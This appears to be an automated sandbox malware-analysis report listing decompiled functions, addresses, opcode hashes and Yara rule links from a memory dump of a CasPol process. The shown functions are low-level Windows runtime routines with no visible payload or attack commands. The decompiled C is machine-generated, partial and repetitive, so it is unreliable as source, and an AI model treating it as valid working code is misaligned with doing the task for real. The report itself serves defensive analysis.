
                                                                        Function 0147138A Relevance: .0, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 61%
                                                                        			E0147138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x14ad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E013FFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E013D7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E013FB640(E013F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                        0x0147138a
                                                                        0x0147138a
                                                                        0x01471399
                                                                        0x014713a3
                                                                        0x014713a8
                                                                        0x014713aa
                                                                        0x014713b5
                                                                        0x014713bb
                                                                        0x014713c3
                                                                        0x014713c6
                                                                        0x014713c9
                                                                        0x014713d4
                                                                        0x014713e6
                                                                        0x014713d6
                                                                        0x014713df
                                                                        0x014713df
                                                                        0x014713f1
                                                                        0x014713f2
                                                                        0x014713f4
                                                                        0x014713f9
                                                                        0x0147140e

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8c9e71bb61d038eb9a45f5aac2f4e8039a08e2a0d838641649c920aeebce7fe0
                                                                        • Instruction ID: b3b77c3c9a4decd763cc2385c64b57a57bba606d4268ceccd94e350ce178a21c
                                                                        • Opcode Fuzzy Hash: 8c9e71bb61d038eb9a45f5aac2f4e8039a08e2a0d838641649c920aeebce7fe0
                                                                        • Instruction Fuzzy Hash: 20015271E00219AFDB14DFA9D881FAEBBB8EF44714F40405AB904EB390D6749A15CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014714FB Relevance: .0, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 61%
                                                                        			E014714FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x14ad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E013FFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E013D7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E013FB640(E013F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                        0x014714fb
                                                                        0x014714fb
                                                                        0x0147150a
                                                                        0x01471514
                                                                        0x01471519
                                                                        0x0147151b
                                                                        0x01471526
                                                                        0x0147152c
                                                                        0x01471534
                                                                        0x01471537
                                                                        0x0147153a
                                                                        0x01471545
                                                                        0x01471557
                                                                        0x01471547
                                                                        0x01471550
                                                                        0x01471550
                                                                        0x01471562
                                                                        0x01471563
                                                                        0x01471565
                                                                        0x0147156a
                                                                        0x0147157f

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 84696afab8cb6334f99ed86d457e7457455ea3776581ac3300f70361b6d6b76b
                                                                        • Instruction ID: 86450d0620e4a01daeb45bb00320c395ba4f93a08763e55f1328107f0e5b2658
                                                                        • Opcode Fuzzy Hash: 84696afab8cb6334f99ed86d457e7457455ea3776581ac3300f70361b6d6b76b
                                                                        • Instruction Fuzzy Hash: 1D019271A00248AFDB14DFADD841FAEBBB8EF44714F40405AF905EB380D674DA00CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013B58EC Relevance: .0, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E013B58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x14ad360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1395c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E013B5943() != 0 &&  *0x14a5320 > 5) {
					E01437B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01437B5E( &_v28, _t28);
					_t11 = E01437B9C(0x14a5320, 0x139bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E013FB640(_t11, _t17, _v8 ^ _t29, 0x139bf15, _t27, _t28);
			}















                                                                        0x013b58fb
                                                                        0x013b58fe
                                                                        0x013b5906
                                                                        0x013b590a
                                                                        0x013b593c
                                                                        0x013b593c
                                                                        0x013b590c
                                                                        0x013b590c
                                                                        0x013b5911
                                                                        0x00000000
                                                                        0x013b5913
                                                                        0x013b5913
                                                                        0x013b5913
                                                                        0x013b5911
                                                                        0x013b591d
                                                                        0x01411035
                                                                        0x0141103c
                                                                        0x0141103f
                                                                        0x01411056
                                                                        0x01411056
                                                                        0x013b593b

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 42cf5c75616396c421e65cec47dc6d948b3920d94c5f789976162470045b5b6b
                                                                        • Instruction ID: eca04faced8dd33a9a5409a3f1d2c46b2eda9cdc479bf862916089da23d34c79
                                                                        • Opcode Fuzzy Hash: 42cf5c75616396c421e65cec47dc6d948b3920d94c5f789976162470045b5b6b
                                                                        • Instruction Fuzzy Hash: 0A01F271B001099BCB14EB29D8409EFBBBCEFA6138F85006ADB059BA54EE30DD06C790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013CB02A Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013CB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E013D7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01437016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                        0x013cb037
                                                                        0x013cb039
                                                                        0x013cb03b
                                                                        0x013cb040
                                                                        0x0141a60e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141a61d
                                                                        0x013cb04b
                                                                        0x013cb04e
                                                                        0x0141a627
                                                                        0x0141a634
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141a641
                                                                        0x0141a653
                                                                        0x0141a643
                                                                        0x0141a64c
                                                                        0x0141a64c
                                                                        0x0141a65b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141a66c
                                                                        0x013cb057
                                                                        0x013cb057
                                                                        0x013cb057
                                                                        0x013cb046
                                                                        0x013cb046
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                        • Instruction ID: 9a99b5898eb7507c273858bd7622d277e3dd5852b351358b3fba63483ad14bf8
                                                                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                        • Instruction Fuzzy Hash: F001D4722015C49FE322971CC944F66BBDCEB95B88F0904A6FA19CBA65D738DC40C724
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01481074 Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E01481074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0148165E(__ebx, 0x14a8ae4, (__edx -  *0x14a8b04 >> 0x14) + (__edx -  *0x14a8b04 >> 0x14), __edi, __ecx, (__edx -  *0x14a8b04 >> 0x14) + (__edx -  *0x14a8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0147AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E013D7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0146FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                        0x01481074
                                                                        0x01481080
                                                                        0x01481082
                                                                        0x0148108a
                                                                        0x0148108f
                                                                        0x01481093
                                                                        0x014810ab
                                                                        0x014810ab
                                                                        0x014810c3
                                                                        0x014810cf
                                                                        0x014810e1
                                                                        0x014810d1
                                                                        0x014810da
                                                                        0x014810da
                                                                        0x014810e9
                                                                        0x014810f5
                                                                        0x014810f5
                                                                        0x014810fe

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6920b12e7ad3400111c7781d6803460e61cca35f706cdd28b47820e615057606
                                                                        • Instruction ID: 63dcd04d7950f12adaf3b5ab246277fc1766e47e6afba97e21742e4a79587f0c
                                                                        • Opcode Fuzzy Hash: 6920b12e7ad3400111c7781d6803460e61cca35f706cdd28b47820e615057606
                                                                        • Instruction Fuzzy Hash: 440128726047429FC710EB29DC40B5F7BE5BB94614F04851BF985937A0DE30D442CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0146FE3F Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 59%
                                                                        			E0146FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x14ad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E013FFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E013D7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E013FB640(E013F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                        0x0146fe3f
                                                                        0x0146fe3f
                                                                        0x0146fe4e
                                                                        0x0146fe58
                                                                        0x0146fe5d
                                                                        0x0146fe5f
                                                                        0x0146fe6a
                                                                        0x0146fe72
                                                                        0x0146fe75
                                                                        0x0146fe78
                                                                        0x0146fe83
                                                                        0x0146fe95
                                                                        0x0146fe85
                                                                        0x0146fe8e
                                                                        0x0146fe8e
                                                                        0x0146fea0
                                                                        0x0146fea1
                                                                        0x0146fea3
                                                                        0x0146fea8
                                                                        0x0146febd

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 73e964b804bd7e978c622e247a9e28df136548f2700af21d24d8511df1f44250
                                                                        • Instruction ID: 43ebc09a3c76263a22710a587c507bd9e563d549a845000ffaf2526c01d93400
                                                                        • Opcode Fuzzy Hash: 73e964b804bd7e978c622e247a9e28df136548f2700af21d24d8511df1f44250
                                                                        • Instruction Fuzzy Hash: D0018471E00209AFDB14DFADD845FAFBBB8EF44718F00406AFA00AB391DA749915CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0146FEC0 Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 59%
                                                                        			E0146FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x14ad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E013FFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E013D7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E013FB640(E013F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                        0x0146fec0
                                                                        0x0146fec0
                                                                        0x0146fecf
                                                                        0x0146fed9
                                                                        0x0146fede
                                                                        0x0146fee0
                                                                        0x0146feeb
                                                                        0x0146fef3
                                                                        0x0146fef6
                                                                        0x0146fef9
                                                                        0x0146ff04
                                                                        0x0146ff16
                                                                        0x0146ff06
                                                                        0x0146ff0f
                                                                        0x0146ff0f
                                                                        0x0146ff21
                                                                        0x0146ff22
                                                                        0x0146ff24
                                                                        0x0146ff29
                                                                        0x0146ff3e

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 56c947248b4bfc13972fef1b366a64d364c2fd1f1a37ed23818afec925b96348
                                                                        • Instruction ID: cb04a1844d05f9a5cd8de9b4db1e6217b83abf77c63d72624d7ff019b1ca64aa
                                                                        • Opcode Fuzzy Hash: 56c947248b4bfc13972fef1b366a64d364c2fd1f1a37ed23818afec925b96348
                                                                        • Instruction Fuzzy Hash: 0101D871E00209AFDB14DBA9D845FAFBBB8EF45704F40406ABA009B390D9309901C795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01488A62 Relevance: .0, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 54%
                                                                        			E01488A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x14ad360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E013D7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E013FB640(E013F9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                        0x01488a62
                                                                        0x01488a71
                                                                        0x01488a79
                                                                        0x01488a82
                                                                        0x01488a85
                                                                        0x01488a89
                                                                        0x01488a8c
                                                                        0x01488a8f
                                                                        0x01488a92
                                                                        0x01488a95
                                                                        0x01488a9f
                                                                        0x01488ab1
                                                                        0x01488aa1
                                                                        0x01488aaa
                                                                        0x01488aaa
                                                                        0x01488abc
                                                                        0x01488abd
                                                                        0x01488abf
                                                                        0x01488ac4
                                                                        0x01488ada

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 66442416f7dd3f98f061dd8043a3a6832c9cd2c618cb14c02143b83db2886bc0
                                                                        • Instruction ID: 60846bb5a9fea47c9f4659c237e7ff3cc047e9ce2a85d4d856d39ea12892c3f1
                                                                        • Opcode Fuzzy Hash: 66442416f7dd3f98f061dd8043a3a6832c9cd2c618cb14c02143b83db2886bc0
                                                                        • Instruction Fuzzy Hash: FB012171A0021D9FDB00DFA9D9419AEBBB8EF58314F50405AFA04E7351D634A901CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01488ED6 Relevance: .0, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 54%
                                                                        			E01488ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x14ad360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E013D7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E013FB640(E013F9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                        0x01488ed6
                                                                        0x01488ee5
                                                                        0x01488eed
                                                                        0x01488ef0
                                                                        0x01488efa
                                                                        0x01488f03
                                                                        0x01488f0c
                                                                        0x01488f15
                                                                        0x01488f24
                                                                        0x01488f27
                                                                        0x01488f31
                                                                        0x01488f43
                                                                        0x01488f33
                                                                        0x01488f3c
                                                                        0x01488f3c
                                                                        0x01488f4e
                                                                        0x01488f4f
                                                                        0x01488f51
                                                                        0x01488f56
                                                                        0x01488f69

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a8323d1c2149427385c578c3f41626c7e5c85dfb020a55b75c6115cc9d63df6f
                                                                        • Instruction ID: 84bc8832dad6a6a89410fc97d0c67b816d688d28252891c6036dcd0099025146
                                                                        • Opcode Fuzzy Hash: a8323d1c2149427385c578c3f41626c7e5c85dfb020a55b75c6115cc9d63df6f
                                                                        • Instruction Fuzzy Hash: 2E111E71E0020A9FDB04DFA9D441BAEFBF4FF08304F4442AAE518EB781E6349940CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013BDB60 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013BDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E013BDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E013BE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L013BE8B0(__ecx, _t14, 0xfff);
							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                        0x013bdb64
                                                                        0x013bdb66
                                                                        0x013bdb6b
                                                                        0x013bdbaa
                                                                        0x013bdb71
                                                                        0x013bdb76
                                                                        0x013bdb7a
                                                                        0x013bdba3
                                                                        0x013bdb7c
                                                                        0x013bdb87
                                                                        0x013bdb8b
                                                                        0x01414fa1
                                                                        0x01414fb3
                                                                        0x01414fb8
                                                                        0x013bdb91
                                                                        0x013bdb96
                                                                        0x013bdb98
                                                                        0x013bdb98
                                                                        0x013bdb8b
                                                                        0x013bdb7a
                                                                        0x013bdb9d
                                                                        0x013bdba2

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                        • Instruction ID: 80aaa3227eeaa8a6385cca42e91836c54895c4b80f3b224b1f98b0a0b27864a7
                                                                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                        • Instruction Fuzzy Hash: CCF0C8332015239BD7329ADD88C0BE7BA998FD1B6CF160035F3069BF44DE74880286D4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013BB1E1 Relevance: .0, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013BB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E013D7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E013D7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01437016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                        0x013bb1e8
                                                                        0x013bb1ea
                                                                        0x013bb1f3
                                                                        0x01414a17
                                                                        0x013bb1f9
                                                                        0x013bb1f9
                                                                        0x013bb1f9
                                                                        0x013bb201
                                                                        0x01414a21
                                                                        0x01414a2e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01414a3b
                                                                        0x01414a4d
                                                                        0x01414a3d
                                                                        0x01414a46
                                                                        0x01414a46
                                                                        0x01414a55
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013bb20a
                                                                        0x013bb20a
                                                                        0x013bb20a
                                                                        0x013bb20a

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                        • Instruction ID: 86e9fb14dd9dc42b8d25a0fbb015475d9cffc08c7c914b01498954aa3d025ac9
                                                                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                        • Instruction Fuzzy Hash: 5301A9376005849BD322975DC844F9ABB99EF51798F0D4062FB148BBB6EB75D800C315
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0144FE87 Relevance: .0, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 46%
                                                                        			E0144FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x14ad360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E013D7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E013FB640(E013F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                        0x0144fe96
                                                                        0x0144fe9e
                                                                        0x0144fea1
                                                                        0x0144fead
                                                                        0x0144feb3
                                                                        0x0144feb9
                                                                        0x0144fec3
                                                                        0x0144fed5
                                                                        0x0144fec5
                                                                        0x0144fece
                                                                        0x0144fece
                                                                        0x0144fee0
                                                                        0x0144fee1
                                                                        0x0144fee3
                                                                        0x0144fee8
                                                                        0x0144fefb

                                                                        Memory Dump Source
